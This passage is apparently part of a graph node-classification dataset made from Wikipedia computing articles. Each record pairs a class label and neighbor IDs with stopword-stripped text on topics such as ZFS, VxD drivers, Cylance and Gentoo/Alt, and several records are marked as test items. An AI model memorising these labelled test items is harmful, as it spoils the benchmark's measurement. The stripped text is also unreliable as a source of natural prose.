bootloader named duet capable loading efi designed load mac os x one step needed adapt duet requirements mac os x also newer motherboards already contain efi suitable running macintosh beginning march 2011 slice discussed idea community members resulting development bootloader emulate efi firmware one choice use real uefi firmware boot mac os x march 2007 osx86 community made significant progress development live dvd live dvd allows booting working system mac os x v10.4.8 january 2 2009 insanelymac live dvd team published new method mac os x v10.5.x live dvd could produced allowing users boot fully working macos desktop dvd usb flash drive method reliable previous methods manipulated apple existing netboot imageboot functionalities behaved system running network disk easier produce requiring single script added existing installation distributions live dvd made since inception since notable method shown work normal apple mac hardware also possible run macos virtual machine inside operating systems installed standard pc hardware using virtualization software oracle virtualbox though officially supported oracle likewise also possible install macos vmware software though company states officially supported vmware running apple-labeled computers according apple licensing policies",
    "neighbors": [
      6153,
      1042,
      7963,
      2088,
      10153,
      5681,
      823,
      7354,
      977,
      5844,
      3428,
      2149,
      8676,
      231,
      1515,
      5356,
      5358,
      499,
      11513,
      4603,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 9338,
    "label": 3,
    "text": "Static_core:static core static core generally refers microprocessor mpu entirely implemented static logic static core mpu may halted stopping system clock oscillator driving maintaining state resume processing point stopped clock signal restarted long power continues applied static core mpus fabricated cmos process hence consume little power clock stopped making useful designs mpu remains standby mode needed minimal loading power source often battery desirable standby comparison typical microprocessor designs without static core refresh present valid outputs pins specific periods clock cycle clock slowed stopped charge pin leaks capacitors time quickly moving default state longer valid designs run within set range clock frequencies avoid problem static core microprocessors include rca 1802 intel 80386ex wdc w65c02s wdc w65c816s freescale 683xx family many low-power electronics systems designed fully static systems—such example psion organiser trs-80 model 100 galileo spacecraft fully static system processor static core data stored static ram rather dynamic ram design features allow entire system paused indefinitely low power state instantly resumed needed",
    "neighbors": [
      3010,
      4244,
      3319
    ],
    "mask": "None"
  },
  {
    "node_id": 9339,
    "label": 4,
    "text": "Generalized_TTL_security_mechanism:generalized ttl security mechanism generalized ttl security mechanism gtsm proposed internet data transfer security method relying packet time live ipv4 hop limit ipv6 thus protect protocol stack spoofing denial service attacks desired purpose proposal verify whether packet originated adjacent node protect router infrastructure overload-based attacks protocols gtsm enabled following procedure performed many people given credit creating idea among paul traina jon stewart similar method also proposed ryan mcdowell",
    "neighbors": [
      2409,
      11250,
      5469,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 9340,
    "label": 2,
    "text": "VxD:vxd vxd device driver model used microsoft windows/386 386 enhanced mode windows 3.x windows 9x extent also novell dos 7 opendos 7.01 dr-dos 7.02 higher multitasker codice_1 vxds access memory kernel running processes well raw access hardware name vxd abbreviation virtual xxx driver xxx class hardware device derives fact drivers filenames form codice_2 windows 3.x examples vjoyd.386 joystick vmm.386 memory manager vxds usually filename extension codice_3 windows 3.x codice_4 windows 9x vxds written windows 3.x used windows 9x vice versa prior advent windows dos applications would either communicate directly various pieces hardware responding interrupts reading writing device memory etc go dos device driver dos multitasking application would exclusive complete control hardware running though windows applications n't often communicate directly hardware way windows drivers still real standard modes windows 3.x windows/386 onward allowed multiple dos applications execute concurrently executing within virtual machine share physical resources among virtual machines microsoft introduced virtual device drivers drivers solved issues relating conflicting usage physical resources intercepting calls hardware instead machine port representing actual device would represent virtual device could managed operating system although windows 98 introduced windows driver model wdm vxd device drivers used windows 98 windows vxds usable windows nt descendants starting windows 2000 windows nt-based operating systems also use windows driver model windows nt 4 earlier versions must use drivers written specifically using vxd drivers instead wdm drivers windows 9x resulted advanced acpi states like hibernation unavailable vxds confused similarly named ntvdm-specific 'vdds virtual device drivers provide method emulating direct i/o windows nt dos box ntvdm vdds run regular 32-bit user-mode dlls must rely win32 api another wdm driver emulate desired i/o behalf 16-bit program",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      3109,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      4695,
      603,
      2145,
      1656,
      5754,
      639,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      10414,
      178,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      5363,
      2804,
      11513,
      8959,
      6927,
      8976,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      9525,
      5952,
      1348,
      4423,
      844,
      4441,
      10079,
      11616,
      9066,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      3496,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 9341,
    "label": 4,
    "text": "Cylance:cylance cylance inc. software firm develops antivirus programs kinds computer software prevent rather reactively detect viruses malware company based irvine california cylance described “ first company apply artificial intelligence algorithms machine learning cyber security. ” february 2019 company acquired blackberry limited company mission block computer viruses malware effect user computer cylance founded stuart mcclure ryan permeh mcclure previously co-founder foundstone security consultancy sold mcafee 2004 becoming firm chief tech officer mcclure also author hacking exposed reportedly best-selling security book date cylance founding came result mcclure speeches previously given cybersecurity often asked protected computer noted lacked trust security technology since reactive nature meaning cleaned attack consequently mcclure began developing technology based proactive protection initial funding 15 million reported february 2013 another 20 million february 2014 july 2015 report indicated cylance raised additional 42 million investors including draper fisher jurvetson kohlberg kravis roberts dell capitalone teneleven ventures received 100 million june 2016 lead investors blackstone tactical opportunities part blackstone group insight venture partners mcclure stated cylance antivirus product use typical security features unique signatures heuristics behavioral analysis sandboxing virtualization blacklisting rather product uses artificial intelligence identify stop attackers mcclure stated cylance security features similar human brain way identifying threats wherein teaches computers identify indicators attack operation cleaver covert cyberwarfare operation carried iranian government targets around world specifically critical infrastructure entities cylance uncovered operation described report released late 2014 iranian officials rejected cylance conclusions fbi tacitly confirmed may 2016 cylance announced new collaboration motex osaka-based firm integrate motex lanscope endpoint security management cylanceprotect cylance leading product proactively detects prevents malware end product called cylanceprotect cat collaboration brings cylance activities japanese market february 2019 company acquired blackberry limited 1.4 billion march 2018 cylance 2018 mspworld cup award november 2017 linkedin recognized cylance one top companies startups year 2017 october 2017 cylance certified great place work greatplacetowork.com october 2017 cylance recognized cyber security leader 2017 cyber defense magazine september 2017 cylance announced winner gartner peer insights customer choice award endpoint protection platforms gartner inc august 2017 cylance made inc. magazine inc. 5000 list second year row june 2017 cylance special jury award best show security product interop tokyo 2017 june 2017 cylance top product cylanceprotect named best enterprise security solution 2017 sc media awards europe event may 2017 cylance made cnbc disruptor 50 list second year row april 2017 cylance given 5-star rating crn 2017 partner program guide march 2017 cylanceprotect named best endpoint protection product 2016 sans community july 2016 mcclure named orange county entrepreneur year category technology 2016 cylance ranked 23 forbes cloud 100 list",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      3981,
      10637,
      410,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      10539,
      10872,
      6834,
      4403,
      9523,
      10166,
      7739,
      6271,
      704,
      7103,
      7362,
      9408,
      9537,
      4421,
      10308,
      202,
      1355,
      2892,
      5069,
      10574,
      3152,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      7515,
      8668,
      2654,
      9055,
      9569,
      11622,
      3949,
      6382,
      4464,
      9713,
      3955,
      6643,
      1400,
      2558,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 9342,
    "label": 2,
    "text": "Gentoo/Alt:gentoo/alt gentoo/alt gentoo linux project created manage porting portage framework features operating systems mac os x free bsds gentoo/alt set pieter van den abeele daniel robbins pieter van den abeele founded gentoo mac os x. gentoo mac os x first non-linux project gentoo focused making gentoo experience available apple operating system introducing portage system separate entity roughly similar fink macports used portage instead debian-like ports-like system later gentoo mac os x made subproject gentoo/alt currently project longer active prime assumption using modifying host os appeared realistic eventually broke packages made hardly maintainable gentoo mac os x superseded gentoo prefix currently gentoo offers mac os x users gentoo/*bsd subproject covers ports bsd-derived operating systems currently consists three sections gentoo/freebsd gentoo/netbsd gentoo/openbsd gentoo/*bsd project umbrella better classify three subprojects often lot similar issues practice decision-making development handled gentoo/alt project subprojects gentoo/freebsd unix-like operating system developed gentoo linux developers order bring gentoo linux design structure tools portage gentoo linux base layout freebsd operating system gentoo gnu toolchain used instead original freebsd one although project longer maintained active gentoo developers instructions allow installation full gentoo/freebsd system freebsd system ebuilds integrated main portage tree port far complete due amount packages needing ported lack proper live cd right freesbie live cd freebsd setup cd used installation current semi official logo gentoo/freebsd daemonized g derived original gentoo linux logo inspired bsd daemon designed marius morawski responding unofficial contest launched diego elio pettenò blog gentoo/netbsd project provide gnu userland managed portage netbsd kernel project started damian florczyk currently x86 architecture targeted system whole incomplete state gentoo/openbsd gentoo/*bsd subproject port gentoo features portage openbsd operating system originally started grant goodyear currently development hiatus iso image based openbsd 3.8 currently maintained karol pasternak downloaded project web site gentoo/dragonflybsd currently unofficial port dragonflybsd kernel project developed robert sebastian gerus unofficial port gnu hurd also developed abandoned late 2006 youngest member gentoo/alt gentoo prefix project emerged gentoo mac os x project suffered multiple practical problems initially allows installation mac os x solaris freebsd linux distributions core principle gentoo prefix installation packages portage done offset thereby leaving host os unmodified side effect administrative privileges required led benda xu gentoo rap android devices installs variant gentoo called gentoo rap directory prefix alongside android linux kernel used android gentoo rap gentoo/interix eprefix port gentoo runs atop interix subsystem windows also known microsoft windows services unix sfu subsystem unix-based applications sua result gentoo/interix project ability install use portage system emerge native windows applications requires visual studio 2008 express edition however feature support wide variety packages supported platforms including interix prefix project mac os x tested supported mac os x tiger leopard snow leopard powerpc ia-32 x86-64 architectures unofficial port solaris operating system portaris announced around 2006 never got public state superseded gentoo prefix project started 2011 google summer code project plan 9 gentoo takes gentoo base overlays userspace inspired plan 9 stated objectives project better hardware support better software support create culture shock people previously used linux systems project presently maintained robert seaton",
    "neighbors": [
      7552,
      5380,
      9487,
      5397,
      8725,
      10016,
      11174,
      4775,
      7983,
      823,
      7483,
      9151,
      9153,
      5067,
      6361,
      3802,
      1379,
      741,
      5356,
      3058,
      499,
      5363,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 9343,
    "label": 6,
    "text": "ZFS:zfs zfs combined file system logical volume manager designed sun microsystems zfs scalable includes extensive protection data corruption support high storage capacities efficient data compression integration concepts filesystem volume management snapshots copy-on-write clones continuous integrity checking automatic repair raid-z native nfsv4 acls precisely configured two main implementations oracle openzfs project extremely similar making zfs widely available within unix-like systems zfs name stands nothing—briefly assigned backronym zettabyte file system longer considered initialism originally zfs proprietary closed-source software developed internally sun part solaris team led cto sun storage business unit sun fellow jeff bonwick 2005 bulk solaris including zfs licensed open-source software common development distribution license cddl opensolaris project zfs became standard feature solaris 10 june 2006 2010 sun microsystems acquired oracle zfs became registered trademark belonging oracle oracle stopped releasing updated source code new opensolaris zfs development effectively reverting oracle zfs closed source response illumos project founded maintain enhance existing open source solaris 2013 openzfs founded coordinate development open source zfs openzfs maintains manages core zfs code organizations using zfs maintain specific code validation processes required zfs integrate within systems openzfs widely used unix-like systems 2017 one analyst described openzfs proven open source data-validating enterprise file system management stored data generally involves two aspects physical volume management one block storage devices hard drives sd cards organization logical block devices seen operating system often involving volume manager raid controller array manager suitable device driver management data files stored logical block devices file system data storage zfs unusual unlike storage systems unifies roles acts volume manager file system therefore complete knowledge physical disks volumes including condition status logical arrangement volumes also files stored zfs designed ensure subject suitable hardware data stored disks lost due physical errors misprocessing hardware operating system bit rot events data corruption may happen time complete control storage system used ensure every step whether related file management disk management verified confirmed corrected needed optimized way storage controller cards separate volume file managers achieve zfs also includes mechanism dataset pool level snapshots replication including snapshot cloning described freebsd documentation one powerful features features even file systems snapshot functionality lack large numbers snapshots taken without degrading performance allowing snapshots used prior risky system operations software changes entire production live file system fully snapshotted several times hour order mitigate data loss due user error malicious activity snapshots rolled back live previous file system states viewed even large file systems leading savings comparison formal backup restore processes snapshots also cloned form new independent file systems pool level snapshot known checkpoint available allows rollback operations may affect entire pool structure add remove entire datasets examples features specific zfs include unlike many file systems zfs intended work towards specific aims primary targets enterprise standard data management commercial environments hardware capable supporting zfs capabilities data resilience resources needed serve data efficiently system configuration poorly matched zfs zfs may underperform significantly 2017 zfs benchmarks zfs developers calomel stated common system design failures include zfs acts volume manager file system terminology layout zfs storage covers two aspects many terms particular zfs list covers zfs commands allow examination physical storage terms devices vdevs organized data pools stored across vdevs various ways various commands expose in-depth statistics zfs internal status internal performance/statistics data allow settings optimized physical devices used zfs hard drives hdds ssds organized groups known vdevs virtual devices used store data vdevs fundamental part zfs conceived groups disks provide redundancy failure physical devices vdev must able maintain integrity data holds must contain enough disks risk data loss within acceptably tiny vdev become unreadable due disk errors otherwise entire pool part also fail see data recovery vdev one vdev acts independent unit redundant storage devices might vdev unused spare disks disks formatted non-zfs filing systems offline disks cache devices physical structure pool defined configuring many vdevs type adding pool zfs exposes manages individual disks within system well vdevs pools datasets volumes organized within pool data automatically distributed zfs across vdevs making pool zfs stripes data pool across vdevs pool speed efficiency vdev user defines completely independent every vdev different types vdev mixed arbitrarily single zfs system data redundancy required data protected physical device failure ensured user organize devices vdevs either using mirrored vdev raidz vdev data single device vdev may lost device develops fault data mirrored raidz vdev lost enough disks fail time system resilvered replacements due recent disk failures zfs vdev continue function service capable providing least one copy data stored although may become slower due error fixing resilvering part self-repair data integrity processes however zfs designed become unreasonably slow due self-repair unless directed administrator since one goals capable uninterrupted continual use even self checking self repair since zfs device redundancy vdev level also means pool stored across several vdevs one vdevs completely fails entire pool content lost similar raid redundancy systems require data stored capable reconstruction enough devices ensure data unlikely lost due physical devices failing therefore intended vdevs made either mirrored devices raidz array devices sufficient redundancy important data zfs automatically limit possible avoid data loss device fails backups replication also expected part data protection vdevs manipulated active use single disk additional devices added create mirrored vdev mirrored vdev physical devices added removed leave larger smaller number mirrored devices single device raidz vdev converted mirror although additional vdevs always added expand storage capacity kind including raidz device vdev marked removal zfs de-allocate data allow removed replaced note devices vdev size zfs may use full capacity disks vdev larger others applies devices within single vdev vdevs independent zfs care different vdevs different sizes built different devices also vdev shrunk size common set aside small amount unused space example 1-2gb multi-tb disk disk needs replacing possible allow slight manufacturing variances replace another disk nominal capacity slightly smaller actual capacity addition devices used main data storage zfs also allows manages devices used caching purposes single devices multiple mirrored devices fully dedicated type cache designated cache usage detailed settings fully deleted created modified without limit live use list zfs cache types given zfs handle devices formatted partitions certain purposes common use generally caches data pools given complete devices multiple complete devices top level data management zfs pool zpool zfs system multiple pools defined vdevs used pool specified pool created others added later zfs use specified vdevs maximize performance storing data – form striping across vdevs therefore important ensure vdev sufficiently redundant loss vdev pool would cause loss pool striping zfs pool expanded time adding new vdevs including system 'live storage space vdevs already allocated pool shrunk data stored across vdevs pool even yet full however explained individual vdevs modified time within stated limits new vdevs added time since addition removal mirrors marking redundant disk offline affect ability vdev store data within pools zfs recognizes two types data store since volumes presented block devices also formatted file system add zfs features file system although usual practice example zfs volume created block device presents partitioned formatted file system ext4 ntfs done either locally network using iscsi similar resulting file system accessible normal also gain zfs benefits data resilience data integrity/scrubbing snapshots additional option data compression snapshots integral feature zfs provide immutable read copies file system single point time even large file systems snapshotted many times every hour sustain tens thousands snapshots snapshot versions individual files entire dataset pool easily accessed searched restored entire snapshot cloned create new copy copied separate server replicated backup pool dataset quickly rolled back specific snapshot snapshots also compared current data check modified data.snapshots take much disk space data deleted space marked free data longer referenced current system snapshot snapshots also easy way avoid impact ransomware generally zfs expect reduce size pool tools reduce set vdevs pool stored tools remove vdevs rolled oracle zfs also exist derivatives openzfs yet generally released openzfs platforms generally therefore 2018 remove entire vdev active use reduce size pool data stored must moved another pool temporary copy made easier deleted later restored backups/copies devices making vdev freed use pool deleted recreated using fewer vdevs smaller size additional capacity added pool time simply adding devices needed defining unused devices vdevs adding new vdevs pool capacity individual vdev generally fixed defined one exception rule single drive mirrored vdevs expanded larger smaller capacities without affecting vdev operation adding larger disks replacing/removing smaller disks shown example pool expanded unused space datasets volumes within pool likewise expanded use unused pool space datasets need fixed size dynamically grow data stored volumes block devices need size defined user must manually resized required done 'live resizing example one major feature distinguishes zfs file systems designed focus data integrity protecting user data disk silent data corruption caused data degradation current spikes bugs disk firmware phantom writes previous write make disk misdirected reads/writes disk accesses wrong block dma parity errors array server memory driver since checksum validates data inside array driver errors data winds wrong buffer inside kernel accidental overwrites swapping live file system etc 1999 study showed neither then-major widespread filesystems ufs ext xfs jfs ntfs hardware raid issues data integrity provided sufficient protection data corruption problems initial research indicates zfs protects data better earlier efforts also faster ufs seen replacement within zfs data integrity achieved using fletcher-based checksum sha-256 hash throughout file system tree block data checksummed checksum value saved pointer block—rather actual block next block pointer checksummed value saved pointer checksumming continues way file system data hierarchy root node also checksummed thus creating merkle tree in-flight data corruption phantom reads/writes data written/read checksums correctly actually wrong undetectable filesystems store checksum data zfs stores checksum block parent block pointer entire pool self-validates block accessed regardless whether data meta-data checksum calculated compared stored checksum value checksums match data passed programming stack process asked values match zfs heal data storage pool provides data redundancy internal mirroring assuming copy data undamaged matching checksums optionally possible provide additional in-pool redundancy specifying means data stored twice three times disk effectively halving reducing one third storage capacity disk additionally kinds data used zfs manage pool stored multiple times default safety even default copies=1 setting copies damaged data exist reconstructed checksums parity data zfs use copy data recreate via raid recovery mechanism recalculate checksum—ideally resulting reproduction originally expected value data passes integrity check system update faulty copies known-good data redundancy restored consistency data held memory cached data arc checked default zfs expected run enterprise quality hardware error correcting ram capability check in-memory data exists enabled using debug flags zfs able guarantee data integrity needs multiple copies data usually spread across multiple disks typically achieved using either raid controller so-called soft raid built file system zfs work hardware raid devices zfs usually work efficiently greater protection data raw access storage devices disks connected system using hardware firmware soft raid controller modifies usual zfs-to-disk i/o path zfs relies disk honest view determine moment data confirmed safely written numerous algorithms designed optimize use caching cache flushing disk handling third-party device performs caching presents drives zfs single system without low level view zfs relies upon much greater chance system perform less optimally failure preventable zfs quickly fully recovered zfs example hardware raid card used zfs may able determine condition disks whether raid array degraded rebuilding may know data corruption place data optimally across disks make selective repairs control repairs balanced ongoing use may able make repairs even could usually hardware raid card interfere raid controllers also usually add controller-dependent data drives prevents software raid accessing user data possible read data compatible hardware raid controller n't always possible controller card develops fault replacement may available cards may understand manufacturer custom data needed manage restore array new card therefore unlike systems raid cards similar used offload resources processing enhance performance reliability zfs strongly recommended methods used typically reduce system performance reliability disks must connected raid controller recommended use plain hba host adapter fanout card configure card jbod mode i.e turn raid caching functions allow devices attached zfs-to-disk i/o pathway unchanged raid card jbod mode may still interfere cache depending upon design may detach drives respond time seen many energy-efficient consumer-grade hard drives may require time-limited error recovery tler /cctl/erc-enabled drives prevent drive dropouts cards suitable even raid functions disabled instead hardware raid zfs employs soft raid offering raid-z parity based like raid 5 similar disk mirroring similar raid 1 schemes highly flexible raid-z data/parity distribution scheme like raid-5 uses dynamic stripe width every block raid stripe regardless blocksize resulting every raid-z write full-stripe write combined copy-on-write transactional semantics zfs eliminates write hole error raid-z also faster traditional raid 5 need perform usual read-modify-write sequence stripes different sizes raid-z reconstruction traverse filesystem metadata determine actual raid-z geometry would impossible filesystem raid array separate products whereas becomes feasible integrated view logical physical structure data going metadata means zfs validate every block 256-bit checksum goes whereas traditional raid products usually addition handling whole-disk failures raid-z also detect correct silent data corruption offering self-healing data reading raid-z block zfs compares checksum data disks return right answer zfs reads parity figures disk returned bad data repairs damaged data returns good data requestor raid-z mirroring require special hardware need nvram reliability need write buffering good performance data protection raid-z zfs provides fast reliable storage using cheap commodity disks five different raid-z modes raid-z0 similar raid 0 offers redundancy raid-z1 similar raid 5 allows one disk fail raid-z2 similar raid 6 allows two disks fail raid-z3 raid 7 configuration allows three disks fail mirroring similar raid 1 allows one disk fail need raid-z3 arose early 2000 muti-terabyte capacity drives became common increase capacity without corresponding increase throughput speeds meant rebuilding array due failed drive could take weeks even months complete time older disks array stressed additional workload could result data corruption drive failure increasing parity raid-z3 reduces chance data loss simply increasing redundancy zfs tool equivalent fsck standard unix linux data checking repair tool file systems instead zfs built-in scrub function regularly examines data repairs silent corruption problems differences official recommendation sun/oracle scrub enterprise-level disks month cheaper commodity disks week zfs 128-bit file system address 1.84 × 10 times data 64-bit systems btrfs maximum limits zfs designed large never encountered practice instance fully populating single zpool 2 bits data would require 3×10 tb hard disk drives theoretical limits zfs oracle solaris encryption capability zfs embedded i/o pipeline writes block may compressed encrypted checksummed deduplicated order policy encryption set dataset level datasets file systems zvols created wrapping keys provided user/administrator changed time without taking file system offline default behaviour wrapping key inherited child data sets data encryption keys randomly generated dataset creation time descendant datasets snapshots clones share data encryption keys command switch new data encryption key clone time provided—this re-encrypt already existing data instead utilising encrypted master-key mechanism zfs automatically allocate data storage across vdevs pool devices vdev way generally maximises performance pool zfs also update write strategy take account new disks added pool added general rule zfs allocates writes across vdevs based free space vdev ensures vdevs proportionately less data already given writes new data stored helps ensure pool becomes used situation develop vdevs become full forcing writes occur limited number devices also means data read reads much frequent writes uses different parts data read many disks possible time giving much higher read performance therefore general rule pools vdevs managed new storage added situation arise vdevs pool almost full others almost empty make pool less efficient pools hot spares compensate failing disks mirroring block devices grouped according physical chassis filesystem continue case failure entire chassis storage pool composition limited similar devices consist ad-hoc heterogeneous collections devices zfs seamlessly pools together subsequently doling space needed arbitrary storage device types added existing pools expand size storage capacity vdevs available file system instances zpool quota set limit amount space file system instance occupy reservation set guarantee space available file system instance zfs uses different layers disk cache speed read write operations ideally data stored ram usually expensive therefore data automatically cached hierarchy optimize performance versus cost often called hybrid storage pools frequently accessed data stored ram less frequently accessed data stored slower media solid state drives ssds data often accessed cached left slow hard drives old data suddenly read lot zfs automatically move ssds ram zfs caching mechanisms include one reads writes case two levels caching exist one computer memory ram one fast storage usually solid state drives ssds total four caches number caches cache divisions queues also exist within zfs example vdev data cache arc cache divided data stored user metadata used zfs control balance zfs uses copy-on-write transactional object model block pointers within filesystem contain 256-bit checksum 256-bit hash currently choice fletcher-2 fletcher-4 sha-256 target block verified block read blocks containing active data never overwritten place instead new block allocated modified data written metadata blocks referencing similarly read reallocated written reduce overhead process multiple updates grouped transaction groups zil intent log write cache used synchronous write semantics required blocks arranged tree checksums see merkle signature scheme advantage copy-on-write zfs writes new data blocks containing old data retained allowing snapshot version file system maintained zfs snapshots consistent reflect entire data existed single point time created extremely quickly since data composing snapshot already stored entire storage pool often snapshotted several times per hour also space efficient since unchanged data shared among file system snapshots snapshots inherently read-only ensuring modified creation although relied sole means backup entire snapshots restored also files directories within snapshots writeable snapshots clones also created resulting two independent file systems share set blocks changes made clone file systems new data blocks created reflect changes unchanged blocks continue shared matter many clones exist implementation copy-on-write principle zfs file systems moved pools also remote hosts network send command creates stream representation file system state stream either describe complete contents file system given snapshot delta snapshots computing delta stream efficient size depends number blocks changed snapshots provides efficient strategy e.g. synchronizing offsite backups high availability mirrors pool dynamic striping across devices maximize throughput means additional devices added zpool stripe width automatically expands include thus disks pool used balances write load across zfs uses variable-sized blocks 128 kb default size available features allow administrator tune maximum block size used certain workloads perform well large blocks data compression enabled variable block sizes used block compressed fit smaller block size smaller size used disk use less storage improve io throughput though cost increased cpu use compression decompression operations zfs filesystem manipulation within storage pool easier volume manipulation within traditional filesystem time effort required create expand zfs filesystem closer making new directory volume manipulation systems pools associated zfs file systems moved different platform architectures including systems implementing different byte orders zfs block pointer format stores filesystem metadata endian-adaptive way individual metadata blocks written native byte order system writing block reading stored endianness match endianness system metadata byte-swapped memory affect stored data usual posix systems files appear applications simple arrays bytes applications creating reading data remain responsible way independent underlying system endianness data deduplication capabilities added zfs source repository end october 2009 relevant opensolaris zfs development packages available since december 3 2009 build 128 effective use deduplication may require large ram capacity recommendations range 1 5 gb ram every tb storage accurate assessment memory required deduplication made referring number unique blocks pool number bytes disk ram core required store record figures reported inbuilt commands zpool zdb insufficient physical memory lack zfs cache result virtual memory thrashing using deduplication cause performance plummet result complete memory starvation deduplication occurs write-time also cpu-intensive also significantly slow system storage vendors use modified versions zfs achieve high data compression ratios two examples 2012 greenbytes tegile may 2014 oracle bought greenbytes zfs deduplication replication technology described deduplication usually recommended due heavy resource requirements especially ram impact performance especially writing specific circumstances system data well-suited space-saving technique authors 2010 study examined ability file systems detect prevent data corruption particular focus zfs observed zfs effective detecting correcting data errors storage devices assumes data ram safe prone error study comments single bit flip memory causes small non-negligible percentage runs experience failure probability committing bad data disk varying 0 3.6 according workload zfs caches pages stores copies metadata ram holds data dirty cache writing disk test made whether checksums still match data point use much risk mitigated one two ways zfs protect data disk failure needs configured redundant storage either raid-z mirrored data copied least two disks single disk used redundant copies data enabled duplicates data logical drive far less safe since vulnerable failure single disk using zfs copies good feature use notebooks desktop computers since disks large least provides limited redundancy single drive historically zfs shipped tools fsck repair damaged file systems file system designed self-repair long built sufficient attention design storage redundancy data pool compromised poor hardware inadequate design redundancy unfortunate mishap point zfs unable mount pool traditionally tools allowed end-user attempt partial salvage stored data led threads online forums zfs developers sometimes tried provide ad-hoc help home small scale users facing loss data due inadequate design poor system management modern zfs improved considerably situation time continues zfs part sun solaris operating system thus available sparc x86-based systems oracle solaris 11 express release os/net consolidation main os code made proprietary closed-source zfs upgrades implementations inside solaris encryption compatible non-proprietary implementations use previous versions zfs creating new zfs pool retain ability use access pool non-proprietary solaris-based distributions recommended upgrade solaris 11 express opensolaris snv_134b thereby stay zfs version 28 opensolaris 2008.05 2008.11 2009.06 use zfs default filesystem dozen 3rd-party distributions nearly dozen mentioned openindiana illumos two new distributions included opensolaris distribution reference page openindiana uses openzfs feature flags implemented illumos zfs version 28 used version 151a3 upgrading opensolaris snv_134 openindiana solaris 11 express one also ability upgrade separately boot solaris 11 express zfs pool one install solaris 11 express first zfs incompatibilities introduced oracle past zfs version 28 openzfs osx abbreviated o3x implementation zfs macos o3x active development close relation zfs linux illumos zfs implementation maintaining feature flag compatibility zfs linux o3x implements zpool version 5000 includes solaris porting layer spl originally written maczfs enhanced include memory management layer based illumos kmem vmem allocators o3x fully featured supporting lz4 compression deduplication arc l2arc slog maczfs free software providing support zfs macos stable legacy branch provides zfs pool version 8 zfs filesystem version 2 development branch based zfs linux openzfs provides updated zfs functionality zfs zpool version 5000 feature flags proprietary implementation zfs zevo available cost greenbytes inc. implementing zfs file system version 5 zfs pool version 28 zevo offered limited zfs feature set pending commercial development sold oracle 2014 unknown future plans edward o'callaghan started initial port zfs dragonflybsd netbsd zfs port started part 2007 google summer code august 2009 code merged netbsd source tree paweł jakub dawidek ported zfs freebsd part freebsd since version 7.0 includes zfsboot allows booting freebsd directly zfs volume freebsd zfs implementation fully functional missing features kernel cifs server iscsi latter added using externally available packages samba used provide userspace cifs server freebsd 7-stable updates series versions 7.x committed uses zpool version 6 freebsd 8 includes much-updated implementation zfs zpool version 13 supported zpool version 14 support added 8-stable branch january 11 2010 included freebsd release 8.1. zpool version 15 supported release 8.2 8-stable branch gained support zpool version v28 zfs version 5 early june 2011 changes released mid-april 2012 freebsd 8.3 freebsd 9.0-release uses zfs pool version 28 freebsd 9.2-release first freebsd version use new feature flags based implementation thus pool version 5000 midnightbsd desktop operating system derived freebsd supports zfs storage pool version 6 0.3-release derived code included freebsd 7.0-release update storage pool 28 progress 0.4-current based 9-stable sources around freebsd 9.1-release code trueos formerly known pc-bsd desktop-oriented distribution freebsd inherits zfs support freenas embedded open source network-attached storage nas distribution based freebsd zfs support freebsd pc-bsd zfs guru embedded open source network-attached storage nas distribution based freebsd pfsense open source bsd based router supports zfs including installation booting zfs pools version 2.4 nas4free embedded open source network-attached storage nas distribution based freebsd zfs support freebsd zfs storage pool version 5000 project continuation freenas 7 series project based freebsd kernel debian gnu/kfreebsd zfs support kernel however additional userland tools required possible zfs root /boot file system case required grub configuration performed debian installer since wheezy release 31 january 2013 zpool version available 14 squeeze release 28 wheezy-9 release although zfs filesystem supports linux-based operating systems difficulties arise linux distribution maintainers wishing provide native support zfs products due potential legal incompatibilities cddl license used zfs code gpl license used linux kernel enable zfs support within linux loadable kernel module containing cddl-licensed zfs code must compiled loaded kernel according free software foundation wording gpl license legally prohibits redistribution resulting product derivative work though viewpoint caused controversy one potential workaround licensing incompatibility trialed 2006 experimental port zfs code linux fuse system filesystem ran entirely userspace instead integrated linux kernel therefore considered derivative work kernel approach functional suffered significant performance penalties compared integrating filesystem native kernel module running kernel space 2016 zfs fuse project appears defunct native port zfs linux produced lawrence livermore national laboratory llnl released march 2013 following key events zfs linux uses openzfs pool version number 5000 indicates features supports defined via feature flags pool version unchanging number expected never conflict version numbers given oracle another native port linux developed kq infotech 2010 port used zvol implementation lawrence livermore national laboratory starting point release supporting zpool v28 announced january 2011 april 2011 kq infotech acquired stec inc. work zfs ceased source code port found github work kq infotech ultimately integrated llnl native port zfs linux license incompatibility may arise distribution compiled binaries containing zfs code generally agreed distribution source code affected gentoo configuring zfs root filesystem well documented required packages installed package repository slackware also provides documentation supporting zfs kernel module built kernel question cddl license compatibility gpl license resurfaced 2015 linux distribution ubuntu announced intended make precompiled openzfs binary kernel modules available end-users directly distribution official package repositories 2016 ubuntu announced legal review resulted conclusion providing support zfs via binary kernel module violation provisions gpl license others software freedom law center followed ubuntu conclusion fsf sfc reiterated opposing view ubuntu 16.04 lts xenial xerus released april 21 2016 allows user install openzfs binary packages directly ubuntu software repositories legal challenge brought canonical regarding distribution packages 2019 ubuntu support install zfs root filesystem maas allows zfs installed root filesystem port open source zfs attempted 2010 hiatus one year development ceased 2012 october 2017 new port openzfs announced jörgen lundman openzfs developer summit list operating systems distributions add-ons support zfs zpool version supports solaris build based zfs designed implemented team sun led jeff bonwick bill moore matthew ahrens announced september 14 2004 development started 2001 source code zfs integrated main trunk solaris development october 31 2005 released part build 27 opensolaris november 16 2005 sun announced zfs included 6/06 update 